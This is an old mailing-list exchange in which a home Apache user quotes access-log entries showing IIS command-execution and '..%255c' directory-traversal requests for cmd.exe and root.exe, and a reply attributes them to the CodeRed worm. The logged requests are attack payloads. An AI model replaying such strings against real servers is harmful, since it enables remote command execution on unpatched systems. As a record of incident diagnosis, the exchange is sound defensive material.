On Mon, 2001-10-29 at 15:55, Ole Sebastian Stein wrote: > We just got our ADSL and now have a server running Apache on a potato box > at home. DynDNS provides us with dynamic dns. > > Today I found these lines in my acces.log: > > 213.133.35.205 - - [29/Oct/2001:12:54:40 +0100] "GET /scripts/root.exe?/c+dir > HT > TP/1.0" 404 210 > 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /MSADC/root.exe?/c+dir > HTTP > /1.0" 404 208 > 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET > /c/winnt/system32/cmd.exe?/ > c+dir HTTP/1.0" 404 218 > 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET > /d/winnt/system32/cmd.exe?/ > c+dir HTTP/1.0" 404 218 > 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET > /scripts/..%255c../winnt/sy > stem32/cmd.exe?/c+dir HTTP/1.0" 404 232 > 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET > /_vti_bin/..%255c../..%255c > .../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 > 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET > /_mem_bin/..%255c../..%255c > .../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 > > and so on. To me it looks as if 213.145.168.244 is trying > to execute some file giving him root access. Are someone trying to > crack my machine? What should I do?
That's the good old CodeRed worm and varients. Don't worry - it only attacks Microsoft IIS 4+5. Ross
